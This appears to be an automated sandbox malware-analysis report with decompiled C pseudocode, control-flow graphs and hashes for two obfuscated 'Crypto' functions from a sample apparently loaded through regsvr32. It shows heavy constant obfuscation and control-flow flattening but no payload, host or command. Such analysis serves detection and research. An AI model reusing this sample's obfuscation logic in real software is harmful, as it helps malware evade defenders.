                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B8131 Relevance: 7.8, Strings: 6, Instructions: 273COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 583 1b8131-1b8587 call 1b1919 586 1b858c-1b858e 583->586 587 1b8653-1b86db call 1bf5d9 call 1acca2 call 1ad467 call 1bf94b 586->587 588 1b8594-1b859a 586->588 596 1b86dd-1b86e3 587->596 590 1b864c-1b864e 588->590 591 1b85a0-1b85a2 588->591 590->586 593 1b85d8-1b8647 call 1bf5d9 call 1b8eb3 call 1bf94b 591->593 594 1b85a4-1b85a6 591->594 593->586 594->596 597 1b85ac-1b85c6 call 1a4b40 594->597 596->586 601 1b86e9 596->601 604 1b85cb-1b85d7 597->604 601->601
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001B8131() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				unsigned int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				void* _t316;
				void* _t317;
				intOrPtr _t318;
				void* _t321;
				void* _t322;
				void* _t326;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				intOrPtr _t334;
				intOrPtr _t340;
				signed int _t365;
				void* _t367;
				signed int* _t371;

				_t371 =  &_v1172;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x6b2cb2;
				_v1144 = 0xdf1e28;
				_v1144 = _v1144 + 0xcf18;
				_v1144 = _v1144 + 0xffffd4d3;
				_v1144 = _v1144 >> 0xf;
				_v1144 = _v1144 ^ 0x0003f4b3;
				_v1168 = 0x29791d;
				_v1168 = _v1168 << 0xd;
				_v1168 = _v1168 + 0xb6c9;
				_v1168 = _v1168 ^ 0x935d68f1;
				_v1168 = _v1168 ^ 0xbc7be9a6;
				_v1128 = 0xcaea19;
				_v1128 = _v1128 + 0xfffffdf5;
				_v1128 = _v1128 ^ 0x180c7b01;
				_v1128 = _v1128 | 0x774c3fed;
				_v1128 = _v1128 ^ 0x7fc60f58;
				_v1160 = 0xe311fe;
				_v1160 = _v1160 >> 6;
				_v1160 = _v1160 * 0x53;
				_t367 = 0x1abb79c;
				_v1160 = _v1160 + 0xffff7b19;
				_v1160 = _v1160 ^ 0x01252154;
				_v1076 = 0xebae3a;
				_v1076 = _v1076 + 0x107;
				_v1076 = _v1076 ^ 0x46a095c3;
				_v1076 = _v1076 ^ 0x4644cb0e;
				_v1072 = 0x85dda9;
				_v1072 = _v1072 | 0x9d69c676;
				_v1072 = _v1072 ^ 0x9de25c8c;
				_v1152 = 0xb5bfbd;
				_v1152 = _v1152 + 0xffff2814;
				_v1152 = _v1152 ^ 0x1e8d4eba;
				_t328 = 0x69;
				_v1152 = _v1152 * 0x7f;
				_v1152 = _v1152 ^ 0xfe9f8319;
				_v1108 = 0x685693;
				_v1108 = _v1108 ^ 0x20ef93da;
				_v1108 = _v1108 * 0x31;
				_v1108 = _v1108 ^ 0x39fb8cf1;
				_v1084 = 0xecaf96;
				_v1084 = _v1084 | 0xdf21f2ea;
				_v1084 = _v1084 ^ 0x194ea3ef;
				_v1084 = _v1084 ^ 0xc6a19d33;
				_v1056 = 0xb57338;
				_v1056 = _v1056 | 0x17408f00;
				_v1056 = _v1056 ^ 0x17fcd759;
				_v1120 = 0x13bab4;
				_v1120 = _v1120 >> 0x10;
				_v1120 = _v1120 + 0xffff5347;
				_v1120 = _v1120 ^ 0xfffbd67b;
				_v1060 = 0x61f084;
				_v1060 = _v1060 + 0xffffdd40;
				_v1060 = _v1060 ^ 0x006f53a4;
				_v1172 = 0xe70070;
				_v1172 = _v1172 * 0x5c;
				_v1172 = _v1172 | 0x75941c4b;
				_v1172 = _v1172 << 0xd;
				_v1172 = _v1172 ^ 0x878ed615;
				_v1136 = 0xc73169;
				_v1136 = _v1136 + 0xffff433e;
				_v1136 = _v1136 << 0xa;
				_v1136 = _v1136 / _t328;
				_v1136 = _v1136 ^ 0x0038869b;
				_v1080 = 0x701085;
				_v1080 = _v1080 * 0x6f;
				_v1080 = _v1080 << 0xa;
				_v1080 = _v1080 ^ 0x5ca7429b;
				_v1096 = 0xe41417;
				_v1096 = _v1096 >> 0xa;
				_v1096 = _v1096 << 1;
				_v1096 = _v1096 ^ 0x0008f991;
				_v1088 = 0x9b9e84;
				_t329 = 0x5e;
				_v1088 = _v1088 / _t329;
				_v1088 = _v1088 + 0xd43e;
				_v1088 = _v1088 ^ 0x000462a9;
				_v1164 = 0x3b3baa;
				_v1164 = _v1164 + 0xffffcbce;
				_t365 = 0x71;
				_t330 = 0x7b;
				_v1164 = _v1164 * 0x62;
				_v1164 = _v1164 + 0xffffd6df;
				_v1164 = _v1164 ^ 0x169bc0cc;
				_v1156 = 0x7103a;
				_v1156 = _v1156 + 0x1689;
				_v1156 = _v1156 << 0xd;
				_v1156 = _v1156 << 2;
				_v1156 = _v1156 ^ 0x9367905f;
				_v1112 = 0xd3a173;
				_v1112 = _v1112 / _t365;
				_v1112 = _v1112 << 6;
				_v1112 = _v1112 ^ 0x007359ec;
				_v1116 = 0x739f6a;
				_v1116 = _v1116 + 0xffffa10d;
				_v1116 = _v1116 / _t330;
				_v1116 = _v1116 ^ 0x00014f63;
				_v1092 = 0x27a344;
				_v1092 = _v1092 | 0xeff694b3;
				_t331 = 0x5a;
				_v1092 = _v1092 / _t331;
				_v1092 = _v1092 ^ 0x02a94158;
				_v1100 = 0x7bae75;
				_v1100 = _v1100 | 0xfd3ff6f7;
				_v1100 = _v1100 ^ 0xfd712049;
				_v1052 = 0xb083d3;
				_v1052 = _v1052 << 0xf;
				_v1052 = _v1052 ^ 0x41e993e9;
				_v1104 = 0x1e61b7;
				_v1104 = _v1104 / _t365;
				_v1104 = _v1104 + 0x1a94;
				_v1104 = _v1104 ^ 0x000da602;
				_v1132 = 0xda7a20;
				_v1132 = _v1132 + 0x33e0;
				_v1132 = _v1132 * 0x2d;
				_v1132 = _v1132 << 0xe;
				_v1132 = _v1132 ^ 0x2587e93b;
				_v1140 = 0xca4d0;
				_v1140 = _v1140 | 0x65cdfee7;
				_v1140 = _v1140 * 0x60;
				_v1140 = _v1140 ^ 0x2d3cf690;
				_v1148 = 0x2607a1;
				_v1148 = _v1148 >> 4;
				_v1148 = _v1148 << 0xa;
				_v1148 = _v1148 >> 0x10;
				_v1148 = _v1148 ^ 0x00047d85;
				_v1068 = 0xdd65e4;
				_v1068 = _v1068 * 0x56;
				_v1068 = _v1068 ^ 0x4a6596cb;
				_v1064 = 0x21593c;
				_v1064 = _v1064 + 0xffffdc6d;
				_v1064 = _v1064 ^ 0x00237daf;
				_v1124 = 0x9ac0c8;
				_v1124 = _v1124 * 0x4b;
				_v1124 = _v1124 + 0x45ed;
				_v1124 = _v1124 ^ 0xb4e068ff;
				_v1124 = _v1124 ^ 0x99b8f257;
				E001B1919(_t331);
				do {
					while(_t367 != 0x1741c98) {
						if(_t367 == 0x1abb79c) {
							_t367 = 0x8ef32e4;
							continue;
						}
						if(_t367 == 0x8ef32e4) {
							_push(_v1072);
							_push(0x1a109c);
							_push(_v1076);
							_t322 = E001BF5D9(_v1128, _v1160, __eflags);
							_t340 =  *0x1c4c10; // 0x67d820
							_t270 = _t340 + 4; // 0x67d824
							E001B8EB3(_t270, __eflags, _v1152, _v1128, _v1108,  &_v1040, _v1084, _t322, _v1056);
							_t321 = E001BF94B(_t322, _v1120, _v1060, _v1172, _v1136);
							_t371 =  &(_t371[0xd]);
							_t367 = 0x1741c98;
							continue;
						}
						_t378 = _t367 - 0xdc9eabd;
						if(_t367 != 0xdc9eabd) {
							goto L10;
						}
						_t326 = E001A4B40( &_v520, _v1064, _t378,  &_v1040, _v1124); // executed
						return _t326;
					}
					_push(_v1164);
					_push(0x1a10ec);
					_push(_v1088);
					_t316 = E001BF5D9(_v1080, _v1096, __eflags);
					_t317 = E001ACCA2();
					_t334 =  *0x1c4c10; // 0x67d820
					_t318 =  *0x1c4c10; // 0x67d820
					__eflags = _t318 + 0x20c;
					E001AD467(_v1116, _t318 + 0x20c, _v1092, _t318 + 0x20c,  &_v520, _v1100, _t317, _v1052, _t316,  &_v520, _t334 + 4, _v1104);
					_t321 = E001BF94B(_t316, _v1132, _v1140, _v1148, _v1068);
					_t371 =  &(_t371[0x10]);
					_t367 = 0xdc9eabd;
					L10:
					__eflags = _t367 - 0x555d914;
				} while (__eflags != 0);
				return _t321;
			}





















































                                                                                                                0x001b8131
                                                                                                                0x001b8137
                                                                                                                0x001b8141
                                                                                                                0x001b8149
                                                                                                                0x001b8151
                                                                                                                0x001b8159
                                                                                                                0x001b8161
                                                                                                                0x001b8166
                                                                                                                0x001b816e
                                                                                                                0x001b8176
                                                                                                                0x001b817b
                                                                                                                0x001b8183
                                                                                                                0x001b818b
                                                                                                                0x001b8193
                                                                                                                0x001b819b
                                                                                                                0x001b81a3
                                                                                                                0x001b81ab
                                                                                                                0x001b81b3
                                                                                                                0x001b81bb
                                                                                                                0x001b81c3
                                                                                                                0x001b81d1
                                                                                                                0x001b81d5
                                                                                                                0x001b81da
                                                                                                                0x001b81e2
                                                                                                                0x001b81ea
                                                                                                                0x001b81f2
                                                                                                                0x001b81fa
                                                                                                                0x001b8202
                                                                                                                0x001b820a
                                                                                                                0x001b8212
                                                                                                                0x001b821a
                                                                                                                0x001b8222
                                                                                                                0x001b822a
                                                                                                                0x001b8232
                                                                                                                0x001b8241
                                                                                                                0x001b8242
                                                                                                                0x001b8246
                                                                                                                0x001b824e
                                                                                                                0x001b8256
                                                                                                                0x001b8263
                                                                                                                0x001b8267
                                                                                                                0x001b826f
                                                                                                                0x001b8277
                                                                                                                0x001b827f
                                                                                                                0x001b8287
                                                                                                                0x001b828f
                                                                                                                0x001b829a
                                                                                                                0x001b82a5
                                                                                                                0x001b82b0
                                                                                                                0x001b82b8
                                                                                                                0x001b82bd
                                                                                                                0x001b82c5
                                                                                                                0x001b82cd
                                                                                                                0x001b82d8
                                                                                                                0x001b82e3
                                                                                                                0x001b82ee
                                                                                                                0x001b82fb
                                                                                                                0x001b82ff
                                                                                                                0x001b8307
                                                                                                                0x001b830c
                                                                                                                0x001b8314
                                                                                                                0x001b831c
                                                                                                                0x001b8324
                                                                                                                0x001b832f
                                                                                                                0x001b8333
                                                                                                                0x001b833b
                                                                                                                0x001b8348
                                                                                                                0x001b834c
                                                                                                                0x001b8351
                                                                                                                0x001b8359
                                                                                                                0x001b8363
                                                                                                                0x001b8368
                                                                                                                0x001b836c
                                                                                                                0x001b8374
                                                                                                                0x001b8382
                                                                                                                0x001b8387
                                                                                                                0x001b838b
                                                                                                                0x001b8393
                                                                                                                0x001b839b
                                                                                                                0x001b83a3
                                                                                                                0x001b83b2
                                                                                                                0x001b83b5
                                                                                                                0x001b83b6
                                                                                                                0x001b83ba
                                                                                                                0x001b83c2
                                                                                                                0x001b83ca
                                                                                                                0x001b83d2
                                                                                                                0x001b83da
                                                                                                                0x001b83df
                                                                                                                0x001b83e4
                                                                                                                0x001b83ec
                                                                                                                0x001b83fc
                                                                                                                0x001b8400
                                                                                                                0x001b8405
                                                                                                                0x001b840d
                                                                                                                0x001b8415
                                                                                                                0x001b8425
                                                                                                                0x001b8429
                                                                                                                0x001b8431
                                                                                                                0x001b8439
                                                                                                                0x001b8447
                                                                                                                0x001b844c
                                                                                                                0x001b8450
                                                                                                                0x001b8458
                                                                                                                0x001b8460
                                                                                                                0x001b8468
                                                                                                                0x001b8470
                                                                                                                0x001b847b
                                                                                                                0x001b8483
                                                                                                                0x001b848e
                                                                                                                0x001b849c
                                                                                                                0x001b84a0
                                                                                                                0x001b84a8
                                                                                                                0x001b84b0
                                                                                                                0x001b84b8
                                                                                                                0x001b84c5
                                                                                                                0x001b84c9
                                                                                                                0x001b84ce
                                                                                                                0x001b84d6
                                                                                                                0x001b84de
                                                                                                                0x001b84eb
                                                                                                                0x001b84ef
                                                                                                                0x001b84f7
                                                                                                                0x001b84ff
                                                                                                                0x001b8504
                                                                                                                0x001b8509
                                                                                                                0x001b850e
                                                                                                                0x001b8516
                                                                                                                0x001b8523
                                                                                                                0x001b8527
                                                                                                                0x001b852f
                                                                                                                0x001b8537
                                                                                                                0x001b853f
                                                                                                                0x001b8547
                                                                                                                0x001b8554
                                                                                                                0x001b8558
                                                                                                                0x001b8560
                                                                                                                0x001b8568
                                                                                                                0x001b8578
                                                                                                                0x001b858c
                                                                                                                0x001b858c
                                                                                                                0x001b859a
                                                                                                                0x001b864c
                                                                                                                0x00000000
                                                                                                                0x001b864c
                                                                                                                0x001b85a2
                                                                                                                0x001b85d8
                                                                                                                0x001b85dc
                                                                                                                0x001b85e1
                                                                                                                0x001b85ed
                                                                                                                0x001b8614
                                                                                                                0x001b861a
                                                                                                                0x001b8623
                                                                                                                0x001b863d
                                                                                                                0x001b8642
                                                                                                                0x001b8645
                                                                                                                0x00000000
                                                                                                                0x001b8645
                                                                                                                0x001b85a4
                                                                                                                0x001b85a6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b85c6
                                                                                                                0x00000000
                                                                                                                0x001b85cc
                                                                                                                0x001b8653
                                                                                                                0x001b8657
                                                                                                                0x001b865c
                                                                                                                0x001b8668
                                                                                                                0x001b8676
                                                                                                                0x001b867f
                                                                                                                0x001b869e
                                                                                                                0x001b86a4
                                                                                                                0x001b86b9
                                                                                                                0x001b86d3
                                                                                                                0x001b86d8
                                                                                                                0x001b86db
                                                                                                                0x001b86dd
                                                                                                                0x001b86dd
                                                                                                                0x001b86dd
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: <Y!$p$3$?Lw$E$Ys
                                                                                                                • API String ID: 0-486402316
                                                                                                                • Opcode ID: f009b5e111727fd6940bae5d567a1937b328a1663b213133a31555cd5f3470ea
                                                                                                                • Instruction ID: e200723b0c1c0f7547509fe4d78387fd28dcc1cf53c73f82bf5ce43ca48b5ecf
                                                                                                                • Opcode Fuzzy Hash: f009b5e111727fd6940bae5d567a1937b328a1663b213133a31555cd5f3470ea
                                                                                                                • Instruction Fuzzy Hash: B0E100B14083819FC368CF66C58A54BFBE1BBC4758F108A1DF2EA86260D7B58949CF47
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B416E Relevance: 5.3, Strings: 4, Instructions: 331COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 643 1b416e-1b4686 644 1b468e 643->644 645 1b4694 644->645 646 1b4699-1b469f 645->646 647 1b4838-1b485a call 1b2519 646->647 648 1b46a5-1b46a7 646->648 657 1b485f-1b4865 647->657 650 1b47ed-1b4816 call 1a9291 648->650 651 1b46ad-1b46b3 648->651 656 1b481b-1b4822 650->656 654 1b46b9-1b46bf 651->654 655 1b4771-1b47b6 call 1bf5d9 call 1ad2c9 651->655 659 1b4701-1b4748 call 1a303a * 2 654->659 660 1b46c1-1b46c3 654->660 673 1b47bb-1b47eb call 1bf94b 655->673 663 1b4831-1b4833 656->663 664 1b4824-1b482c 656->664 661 1b486a-1b4870 657->661 675 1b474d-1b476c 659->675 660->661 662 1b46c9-1b4700 call 1b17d2 * 2 660->662 661->646 669 1b4876 661->669 663->644 664->644 669->669 673->657 675->645
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001B416E() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				unsigned int _v156;
				signed int _v160;
				void* _t370;
				intOrPtr _t372;
				void* _t373;
				void* _t376;
				intOrPtr _t383;
				intOrPtr _t388;
				intOrPtr _t389;
				void* _t393;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t405;
				intOrPtr _t434;
				void* _t441;
				signed int _t443;
				signed int* _t445;

				_t445 =  &_v160;
				_v12 = 0xacebf2;
				_v8 = 0x745816;
				_t393 = 0;
				_v4 = _v4 & 0;
				_v80 = 0x783526;
				_t6 =  &_v80; // 0x783526
				_v80 =  *_t6 * 0x24;
				_t441 = 0xdedff95;
				_t395 = 0xa;
				_v80 = _v80 / _t395;
				_v80 = _v80 ^ 0x01b0bf55;
				_v160 = 0xc625e;
				_v160 = _v160 + 0xffffe0ff;
				_v160 = _v160 + 0xffffb449;
				_v160 = _v160 << 0xa;
				_v160 = _v160 ^ 0x2fde9800;
				_v144 = 0xa61bd8;
				_v144 = _v144 + 0x3bcb;
				_v144 = _v144 | 0x065677fe;
				_v144 = _v144 ^ 0x68cebb05;
				_v144 = _v144 ^ 0x6e38ccfa;
				_v128 = 0xde23d2;
				_v128 = _v128 + 0x8eb5;
				_v128 = _v128 + 0xffffc326;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x0006f3ad;
				_v92 = 0xb44e92;
				_v92 = _v92 | 0x1f66e038;
				_t396 = 0x14;
				_v92 = _v92 * 0x76;
				_v92 = _v92 ^ 0xbbd209bc;
				_v64 = 0x80ba81;
				_v64 = _v64 * 0x55;
				_v64 = _v64 ^ 0x2ab3afb2;
				_v124 = 0xfee98f;
				_v124 = _v124 | 0x67c29a26;
				_v124 = _v124 + 0x3e3b;
				_v124 = _v124 ^ 0xc76fbb77;
				_v124 = _v124 ^ 0xa09e23ce;
				_v108 = 0xc571e;
				_v108 = _v108 ^ 0x84310f68;
				_v108 = _v108 >> 5;
				_v108 = _v108 ^ 0x0423c0b1;
				_v156 = 0x55cd54;
				_v156 = _v156 + 0xffff433f;
				_v156 = _v156 >> 5;
				_v156 = _v156 + 0xe745;
				_v156 = _v156 ^ 0x000a2489;
				_v48 = 0xb3e979;
				_v48 = _v48 + 0xffffd088;
				_v48 = _v48 ^ 0x00bc8ea1;
				_v88 = 0x8f2b22;
				_v88 = _v88 * 0x38;
				_v88 = _v88 / _t396;
				_v88 = _v88 ^ 0x01988a7e;
				_v32 = 0x6b050d;
				_v32 = _v32 * 0x60;
				_v32 = _v32 ^ 0x2826338f;
				_v56 = 0xe7b4ca;
				_v56 = _v56 >> 3;
				_v56 = _v56 ^ 0x001daa9f;
				_v40 = 0xcb9e36;
				_v40 = _v40 * 0x31;
				_v40 = _v40 ^ 0x26fbe1c0;
				_v20 = 0x20dad8;
				_t397 = 0x79;
				_v20 = _v20 * 0x5f;
				_v20 = _v20 ^ 0x0c309b8e;
				_v148 = 0x1d631f;
				_v148 = _v148 | 0x3b059b9e;
				_v148 = _v148 * 0x26;
				_v148 = _v148 | 0xcb3f565a;
				_v148 = _v148 ^ 0xcf7bf540;
				_v104 = 0xaf48b6;
				_v104 = _v104 / _t397;
				_t398 = 0x3d;
				_v104 = _v104 * 0x3d;
				_v104 = _v104 ^ 0x0053dd31;
				_v96 = 0x834442;
				_v96 = _v96 | 0x95a671eb;
				_v96 = _v96 >> 6;
				_v96 = _v96 ^ 0x0250c20a;
				_v140 = 0xf136e8;
				_v140 = _v140 / _t398;
				_v140 = _v140 >> 4;
				_t399 = 0x3e;
				_v140 = _v140 * 0x36;
				_v140 = _v140 ^ 0x000bb008;
				_v132 = 0x9b8a4b;
				_v132 = _v132 >> 7;
				_v132 = _v132 + 0xffff5857;
				_v132 = _v132 ^ 0x382c70fc;
				_v132 = _v132 ^ 0x3820d223;
				_v72 = 0xca972b;
				_v72 = _v72 >> 0xe;
				_v72 = _v72 + 0xa3b3;
				_v72 = _v72 ^ 0x000660a2;
				_v112 = 0x9668b1;
				_v112 = _v112 / _t399;
				_v112 = _v112 + 0xffffa1e8;
				_v112 = _v112 ^ 0x00047e1e;
				_v60 = 0xec057f;
				_t400 = 0x18;
				_v60 = _v60 / _t400;
				_v60 = _v60 ^ 0x0004248a;
				_v152 = 0xaf1b98;
				_v152 = _v152 + 0xffffc000;
				_v152 = _v152 + 0x3c9d;
				_v152 = _v152 << 0xf;
				_v152 = _v152 ^ 0x8c1f37ac;
				_v24 = 0xbb2b7;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 ^ 0x000415b0;
				_v100 = 0x2e64c5;
				_v100 = _v100 + 0xac1f;
				_v100 = _v100 | 0xbf901060;
				_v100 = _v100 ^ 0xbfb82aad;
				_v52 = 0xb062e9;
				_v52 = _v52 * 0xd;
				_v52 = _v52 ^ 0x08f07c1d;
				_v136 = 0x3e171f;
				_t401 = 0x16;
				_v136 = _v136 / _t401;
				_v136 = _v136 + 0xffff5a49;
				_t402 = 0x3c;
				_v136 = _v136 / _t402;
				_v136 = _v136 ^ 0x000ead41;
				_v116 = 0x1808cc;
				_v116 = _v116 << 6;
				_v116 = _v116 + 0xffff73dd;
				_v116 = _v116 ^ 0x060db815;
				_v44 = 0xaaa2e7;
				_t403 = 0x25;
				_v44 = _v44 / _t403;
				_v44 = _v44 ^ 0x000b9c4a;
				_v84 = 0xb9ac52;
				_v84 = _v84 * 0x4b;
				_v84 = _v84 + 0xffff0412;
				_v84 = _v84 ^ 0x36642c26;
				_v120 = 0x38e985;
				_v120 = _v120 + 0x7f75;
				_v120 = _v120 << 0xc;
				_v120 = _v120 >> 0xe;
				_v120 = _v120 ^ 0x000ddd34;
				_v28 = 0x96a606;
				_v28 = _v28 + 0xffffc2ff;
				_v28 = _v28 ^ 0x009e32bf;
				_v36 = 0x8dc247;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0xc24b65bb;
				_v68 = 0xf7683e;
				_v68 = _v68 + 0xffff4933;
				_v68 = _v68 >> 9;
				_v68 = _v68 ^ 0x00022a30;
				_v76 = 0xf36025;
				_v76 = _v76 << 5;
				_v76 = _v76 >> 0xf;
				_v76 = _v76 ^ 0x000eba4b;
				while(1) {
					L1:
					while(1) {
						_t370 = 0x53a87df;
						do {
							L3:
							if(_t441 == 0x1b3122a) {
								E001B2519(_v44, _v16, _v84, _v92, _v120);
								_t445 =  &(_t445[3]);
								_t441 = 0x5ace2c9;
								L16:
								_t434 =  *0x1c4c0c; // 0x679040
								_t370 = 0x53a87df;
								goto L17;
							}
							if(_t441 == _t370) {
								_t372 =  *0x1c4c0c; // 0x679040
								_t327 = _t372 + 0xc; // 0x4000
								_t328 = _t372 + 8; // 0x679098
								_t405 = _v100;
								_t373 = E001A9291(_t405, _v16, _v52, _v136, _v116,  *_t328,  *_t327, _v144); // executed
								_t445 =  &(_t445[6]);
								__eflags = _t373 - _v128;
								if(__eflags != 0) {
									_t441 = 0xe646deb;
								} else {
									_t441 = 0x1b3122a;
									_t393 = 1;
								}
								goto L1;
							}
							if(_t441 == 0x740ce5d) {
								_push(_v104);
								_push(0x1a1870);
								_push(_v148);
								_t443 = E001BF5D9(_v40, _v20, __eflags);
								_t376 = E001AD2C9(_t443, _v80, _v96, _v140,  &_v16, _v132, _v72, 0); // executed
								__eflags = _t376 - _v160;
								_t405 = _t443;
								_t441 =  ==  ? 0x53a87df : 0xe646deb;
								E001BF94B(_t405, _v112, _v60, _v152, _v24);
								_t445 =  &(_t445[0xc]);
								goto L16;
							}
							if(_t441 == 0xdedff95) {
								_push(_t405);
								_t383 = E001A303A(_t405, 0x4c);
								 *0x1c4c0c = _t383;
								 *((intOrPtr*)(_t383 + 0xc)) = 0x4000;
								_t388 =  *0x1c4c0c; // 0x679040
								_t305 = _t388 + 0xc; // 0x4000
								_t389 = E001A303A(_t405,  *_t305);
								_t434 =  *0x1c4c0c; // 0x679040
								_t445 =  &(_t445[5]);
								_t441 = 0x740ce5d;
								_t306 = _t434 + 0xc; // 0x4000
								_t405 =  *_t306 + _t389;
								 *((intOrPtr*)(_t434 + 8)) = _t389;
								 *((intOrPtr*)(_t434 + 0x10)) = _t389;
								 *((intOrPtr*)(_t434 + 0x34)) = _t389;
								 *(_t434 + 0x2c) = _t405;
								_t370 = 0x53a87df;
								continue;
							}
							if(_t441 != 0xe646deb) {
								goto L17;
							}
							_t291 = _t434 + 8; // 0x679098
							E001B17D2(_v28, _v36,  *_t291);
							E001B17D2(_v68, _v76,  *0x1c4c0c);
							L9:
							return _t393;
							L17:
							__eflags = _t441 - 0x5ace2c9;
						} while (__eflags != 0);
						goto L9;
					}
				}
			}

































































                                                                                                                0x001b416e
                                                                                                                0x001b4174
                                                                                                                0x001b4181
                                                                                                                0x001b418d
                                                                                                                0x001b418f
                                                                                                                0x001b4196
                                                                                                                0x001b419e
                                                                                                                0x001b41a8
                                                                                                                0x001b41ac
                                                                                                                0x001b41b5
                                                                                                                0x001b41ba
                                                                                                                0x001b41c0
                                                                                                                0x001b41c8
                                                                                                                0x001b41d0
                                                                                                                0x001b41d8
                                                                                                                0x001b41e0
                                                                                                                0x001b41e5
                                                                                                                0x001b41ed
                                                                                                                0x001b41f5
                                                                                                                0x001b41fd
                                                                                                                0x001b4205
                                                                                                                0x001b420d
                                                                                                                0x001b4215
                                                                                                                0x001b421d
                                                                                                                0x001b4225
                                                                                                                0x001b422d
                                                                                                                0x001b4232
                                                                                                                0x001b423a
                                                                                                                0x001b4242
                                                                                                                0x001b424f
                                                                                                                0x001b4250
                                                                                                                0x001b4254
                                                                                                                0x001b425c
                                                                                                                0x001b4269
                                                                                                                0x001b426d
                                                                                                                0x001b4275
                                                                                                                0x001b427d
                                                                                                                0x001b4285
                                                                                                                0x001b428d
                                                                                                                0x001b4295
                                                                                                                0x001b429d
                                                                                                                0x001b42a5
                                                                                                                0x001b42ad
                                                                                                                0x001b42b2
                                                                                                                0x001b42ba
                                                                                                                0x001b42c2
                                                                                                                0x001b42ca
                                                                                                                0x001b42cf
                                                                                                                0x001b42d7
                                                                                                                0x001b42df
                                                                                                                0x001b42ea
                                                                                                                0x001b42f5
                                                                                                                0x001b4300
                                                                                                                0x001b430d
                                                                                                                0x001b4317
                                                                                                                0x001b431b
                                                                                                                0x001b4323
                                                                                                                0x001b4336
                                                                                                                0x001b433d
                                                                                                                0x001b4348
                                                                                                                0x001b4350
                                                                                                                0x001b4355
                                                                                                                0x001b435d
                                                                                                                0x001b4370
                                                                                                                0x001b4377
                                                                                                                0x001b4382
                                                                                                                0x001b4399
                                                                                                                0x001b439c
                                                                                                                0x001b43a3
                                                                                                                0x001b43ae
                                                                                                                0x001b43b6
                                                                                                                0x001b43c3
                                                                                                                0x001b43c7
                                                                                                                0x001b43cf
                                                                                                                0x001b43d7
                                                                                                                0x001b43e7
                                                                                                                0x001b43f0
                                                                                                                0x001b43f3
                                                                                                                0x001b43f7
                                                                                                                0x001b43ff
                                                                                                                0x001b4407
                                                                                                                0x001b440f
                                                                                                                0x001b4414
                                                                                                                0x001b441c
                                                                                                                0x001b442c
                                                                                                                0x001b4430
                                                                                                                0x001b443a
                                                                                                                0x001b443d
                                                                                                                0x001b4441
                                                                                                                0x001b4449
                                                                                                                0x001b4451
                                                                                                                0x001b4456
                                                                                                                0x001b445e
                                                                                                                0x001b4466
                                                                                                                0x001b446e
                                                                                                                0x001b4476
                                                                                                                0x001b447b
                                                                                                                0x001b4483
                                                                                                                0x001b448b
                                                                                                                0x001b449b
                                                                                                                0x001b449f
                                                                                                                0x001b44a7
                                                                                                                0x001b44af
                                                                                                                0x001b44bb
                                                                                                                0x001b44c0
                                                                                                                0x001b44c4
                                                                                                                0x001b44cc
                                                                                                                0x001b44d4
                                                                                                                0x001b44dc
                                                                                                                0x001b44e4
                                                                                                                0x001b44e9
                                                                                                                0x001b44f1
                                                                                                                0x001b44fc
                                                                                                                0x001b4504
                                                                                                                0x001b450f
                                                                                                                0x001b4517
                                                                                                                0x001b451f
                                                                                                                0x001b4527
                                                                                                                0x001b452f
                                                                                                                0x001b4542
                                                                                                                0x001b4549
                                                                                                                0x001b4556
                                                                                                                0x001b4562
                                                                                                                0x001b4567
                                                                                                                0x001b456d
                                                                                                                0x001b457e
                                                                                                                0x001b4583
                                                                                                                0x001b4589
                                                                                                                0x001b4591
                                                                                                                0x001b4599
                                                                                                                0x001b459e
                                                                                                                0x001b45a6
